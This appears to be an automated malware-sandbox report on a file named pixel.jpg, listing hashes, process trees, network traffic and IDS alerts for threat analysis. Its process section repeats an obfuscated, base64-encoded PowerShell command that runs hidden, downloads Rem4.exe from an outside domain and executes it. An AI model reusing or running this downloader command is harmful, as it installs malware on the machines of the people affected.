analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

pixel.jpg

Full analysis: https://app.any.run/tasks/1b3925c6-70ca-48a2-a514-1930887b5b03
Verdict: Malicious activity
Analysis date: March 21, 2019, 14:37:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: image/jpeg
File info: JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5, orientation=upper-left, xresolution=74, yresolution=82, resolutionunit=2], baseline, precision 8, 232x309, frames 3
MD5:

682CD610E4135E8A3203E9994076961D

SHA1:

C3016D7F6547536B5B11EBB15FBBBC46EECD39B9

SHA256:

4A1832614F81E61521B7BC845766678B9411C6D09460EDB8310ABBB03A6D5EE2

SSDEEP:

384:2KcrBurfMKAU2HipomnJb93HP63nr/Fdos5E6B6Non4xpq3jYC+AxwEX9VcBgC6i:25BuIRU2CpomnJZvWnbF636BSonm+xwN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3368)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3008)
      • powershell.exe (PID: 2888)
      • powershell.exe (PID: 3448)
      • powershell.exe (PID: 1500)
      • powershell.exe (PID: 3484)
      • powershell.exe (PID: 4072)
      • powershell.exe (PID: 2904)
      • powershell.exe (PID: 3952)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.jpg | JFIF-EXIF JPEG Bitmap (38.4)
.jpg | JFIF JPEG bitmap (30.7)
.jpg | JPEG bitmap (23)
.mp3 | MP3 audio (7.6)

EXIF

JFIF

JFIFVersion: 1.01
ResolutionUnit: None
XResolution: 72
YResolution: 72

EXIF

Orientation: Horizontal (normal)
XResolution: 72
YResolution: 72
ResolutionUnit: inches
ColorSpace: sRGB
ExifImageWidth: 232
ExifImageHeight: 309

Photoshop

IPTCDigest: d41d8cd98f00b204e9800998ecf8427e

Composite

ImageSize: 232x309
Megapixels: 0.072
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
10
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start rundll32.exe no specs cmd.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3648"C:\Windows\System32\rundll32.exe" "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen C:\Users\admin\Desktop\pixel.jpgC:\Windows\System32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3368"C:\Windows\system32\cmd.exe" C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3008poWERSHELl.EXe -EXBYpASs -nOp -wHIDden AppData-ecCQAJACAAKAAJAAkACQAmACgAZwBFAFQALQBjAG8AbQBtAGEAbgBEACAATgBlAHcALQBPAEIASgBFAEMAKgApAAkACQAgAG4AZQBUAC4AVwBlAGIAQwBsAEkARQBuAFQAIAAJACAAKQAuAGQATwBXAE4AbABPAGEAZABGAEkATABlACgACQAgAAkAHSBoAHQAdABwADoALwAvAHcAdwB3AC4AdABpAG0AdQBjAGkAbgBtAHUAcgBhAHQAYQBsAGEAbgAuAGMAbwBtAC8AUgBlAG0ANAAuAGUAeABlAB0gCQAgAAkALAAgACAACQAdICQARQBOAHYAOgB0AEUATQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSAJACAACQApAAkAIAAgADsACQAJACAAcwBBAHAAUwAJACAAIAAdICQAZQBOAHYAOgB0AEUAbQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3448poWERSHELl.EXe -EXBYpASs -nOp -wHIDden AppData -ec CQAJACAAKAAJAAkACQAmACgAZwBFAFQALQBjAG8AbQBtAGEAbgBEACAATgBlAHcALQBPAEIASgBFAEMAKgApAAkACQAgAG4AZQBUAC4AVwBlAGIAQwBsAEkARQBuAFQAIAAJACAAKQAuAGQATwBXAE4AbABPAGEAZABGAEkATABlACgACQAgAAkAHSBoAHQAdABwADoALwAvAHcAdwB3AC4AdABpAG0AdQBjAGkAbgBtAHUAcgBhAHQAYQBsAGEAbgAuAGMAbwBtAC8AUgBlAG0ANAAuAGUAeABlAB0gCQAgAAkALAAgACAACQAdICQARQBOAHYAOgB0AEUATQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSAJACAACQApAAkAIAAgADsACQAJACAAcwBBAHAAUwAJACAAIAAdICQAZQBOAHYAOgB0AEUAbQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1500poWERSHELl.EXe -ec CQAJACAAKAAJAAkACQAmACgAZwBFAFQALQBjAG8AbQBtAGEAbgBEACAATgBlAHcALQBPAEIASgBFAEMAKgApAAkACQAgAG4AZQBUAC4AVwBlAGIAQwBsAEkARQBuAFQAIAAJACAAKQAuAGQATwBXAE4AbABPAGEAZABGAEkATABlACgACQAgAAkAHSBoAHQAdABwADoALwAvAHcAdwB3AC4AdABpAG0AdQBjAGkAbgBtAHUAcgBhAHQAYQBsAGEAbgAuAGMAbwBtAC8AUgBlAG0ANAAuAGUAeABlAB0gCQAgAAkALAAgACAACQAdICQARQBOAHYAOgB0AEUATQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSAJACAACQApAAkAIAAgADsACQAJACAAcwBBAHAAUwAJACAAIAAdICQAZQBOAHYAOgB0AEUAbQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3484poWERSHELl.EXe -EXBYpASs-nOp -wHIDden -ecCQAJACAAKAAJAAkACQAmACgAZwBFAFQALQBjAG8AbQBtAGEAbgBEACAATgBlAHcALQBPAEIASgBFAEMAKgApAAkACQAgAG4AZQBUAC4AVwBlAGIAQwBsAEkARQBuAFQAIAAJACAAKQAuAGQATwBXAE4AbABPAGEAZABGAEkATABlACgACQAgAAkAHSBoAHQAdABwADoALwAvAHcAdwB3AC4AdABpAG0AdQBjAGkAbgBtAHUAcgBhAHQAYQBsAGEAbgAuAGMAbwBtAC8AUgBlAG0ANAAuAGUAeABlAB0gCQAgAAkALAAgACAACQAdICQARQBOAHYAOgB0AEUATQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSAJACAACQApAAkAIAAgADsACQAJACAAcwBBAHAAUwAJACAAIAAdICQAZQBOAHYAOgB0AEUAbQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2888poWERSHELl.EXe -EXBYpASs -nOp -wHIDden -ecCQAJACAAKAAJAAkACQAmACgAZwBFAFQALQBjAG8AbQBtAGEAbgBEACAATgBlAHcALQBPAEIASgBFAEMAKgApAAkACQAgAG4AZQBUAC4AVwBlAGIAQwBsAEkARQBuAFQAIAAJACAAKQAuAGQATwBXAE4AbABPAGEAZABGAEkATABlACgACQAgAAkAHSBoAHQAdABwADoALwAvAHcAdwB3AC4AdABpAG0AdQBjAGkAbgBtAHUAcgBhAHQAYQBsAGEAbgAuAGMAbwBtAC8AUgBlAG0ANAAuAGUAeABlAB0gCQAgAAkALAAgACAACQAdICQARQBOAHYAOgB0AEUATQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSAJACAACQApAAkAIAAgADsACQAJACAAcwBBAHAAUwAJACAAIAAdICQAZQBOAHYAOgB0AEUAbQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4072poWERSHELl.EXe -EXBYpASs -nOp -wHIDden -ec CQAJACAAKAAJAAkACQAmACgAZwBFAFQALQBjAG8AbQBtAGEAbgBEACAATgBlAHcALQBPAEIASgBFAEMAKgApAAkACQAgAG4AZQBUAC4AVwBlAGIAQwBsAEkARQBuAFQAIAAJACAAKQAuAGQATwBXAE4AbABPAGEAZABGAEkATABlACgACQAgAAkAHSBoAHQAdABwADoALwAvAHcAdwB3AC4AdABpAG0AdQBjAGkAbgBtAHUAcgBhAHQAYQBsAGEAbgAuAGMAbwBtAC8AUgBlAG0ANAAuAGUAeABlAB0gCQAgAAkALAAgACAACQAdICQARQBOAHYAOgB0AEUATQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSAJACAACQApAAkAIAAgADsACQAJACAAcwBBAHAAUwAJACAAIAAdICQAZQBOAHYAOgB0AEUAbQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3952poWERSHELl.EXe -ec CQAJACAAKAAJAAkACQAmACgAZwBFAFQALQBjAG8AbQBtAGEAbgBEACAATgBlAHcALQBPAEIASgBFAEMAKgApAAkACQAgAG4AZQBUAC4AVwBlAGIAQwBsAEkARQBuAFQAIAAJACAAKQAuAGQATwBXAE4AbABPAGEAZABGAEkATABlACgACQAgAAkAHSBoAHQAdABwADoALwAvAHcAdwB3AC4AdABpAG0AdQBjAGkAbgBtAHUAcgBhAHQAYQBsAGEAbgAuAGMAbwBtAC8AUgBlAG0ANAAuAGUAeABlAB0gCQAgAAkALAAgACAACQAdICQARQBOAHYAOgB0AEUATQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSAJACAACQApAAkAIAAgADsACQAJACAAcwBBAHAAUwAJACAAIAAdICQAZQBOAHYAOgB0AEUAbQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2904poWERSHELl.EXe -ec CQAJACAAKAAJAAkACQAmACgAZwBFAFQALQBjAG8AbQBtAGEAbgBEACAATgBlAHcALQBPAEIASgBFAEMAKgApAAkACQAgAG4AZQBUAC4AVwBlAGIAQwBsAEkARQBuAFQAIAAJACAAKQAuAGQATwBXAE4AbABPAGEAZABGAEkATABlACgACQAgAAkAHSBoAHQAdABwADoALwAvAHcAdwB3AC4AdABpAG0AdQBjAGkAbgBtAHUAcgBhAHQAYQBsAGEAbgAuAGMAbwBtAC8AUgBlAG0ANAAuAGUAeABlAB0gCQAgAAkALAAgACAACQAdICQARQBOAHYAOgB0AEUATQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSAJACAACQApAAkAIAAgADsACQAJACAAcwBBAHAAUwAJACAAIAAdICQAZQBOAHYAOgB0AEUAbQBQAFwASgBIAGcASABKAC4AZQB4AGUAHSA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 464
Read events
1 011
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
16
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
3008powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P32NF3OB2YWPVRI37PSP.temp
MD5:
SHA256:
3448powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NV9UEQAF1XQR5JSU8H5J.temp
MD5:
SHA256:
1500powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T645VNJMV6PHMLN2OIS6.temp
MD5:
SHA256:
3484powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NG3J79U79MV4UZVZS9HB.temp
MD5:
SHA256:
2888powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YN7HSOSULJHZINS60Y5V.temp
MD5:
SHA256:
4072powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3UWHTWI82J6F9SL5CTK4.temp
MD5:
SHA256:
3952powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1B866WFK5XR5OSGZCZ4E.temp
MD5:
SHA256:
2904powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CHPFTWUXAJA1O4E6SYC4.temp
MD5:
SHA256:
3448powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF10b70d.TMPbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
1500powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1101e1.TMPbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
6
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3952
powershell.exe
GET
301
37.61.239.108:80
http://www.timucinmuratalan.com/Rem4.exe
GB
suspicious
1500
powershell.exe
GET
301
37.61.239.108:80
http://www.timucinmuratalan.com/Rem4.exe
GB
suspicious
2904
powershell.exe
GET
301
37.61.239.108:80
http://www.timucinmuratalan.com/Rem4.exe
GB
suspicious
1500
powershell.exe
GET
404
37.61.239.108:80
http://timucinmuratalan.com/Rem4.exe
GB
html
91.8 Kb
suspicious
3952
powershell.exe
GET
404
37.61.239.108:80
http://timucinmuratalan.com/Rem4.exe
GB
html
91.8 Kb
suspicious
2904
powershell.exe
GET
404
37.61.239.108:80
http://timucinmuratalan.com/Rem4.exe
GB
html
91.8 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1500
powershell.exe
37.61.239.108:80
www.timucinmuratalan.com
Namecheap, Inc.
GB
suspicious
2904
powershell.exe
37.61.239.108:80
www.timucinmuratalan.com
Namecheap, Inc.
GB
suspicious
3952
powershell.exe
37.61.239.108:80
www.timucinmuratalan.com
Namecheap, Inc.
GB
suspicious

DNS requests

Domain
IP
Reputation
www.timucinmuratalan.com
  • 37.61.239.108
suspicious
timucinmuratalan.com
  • 37.61.239.108
suspicious

Threats

PID
Process
Class
Message
1500
powershell.exe
Potentially Bad Traffic
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
1500
powershell.exe
Potentially Bad Traffic
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
3952
powershell.exe
Potentially Bad Traffic
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
3952
powershell.exe
Potentially Bad Traffic
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
2904
powershell.exe
Potentially Bad Traffic
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
2904
powershell.exe
Potentially Bad Traffic
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
No debug info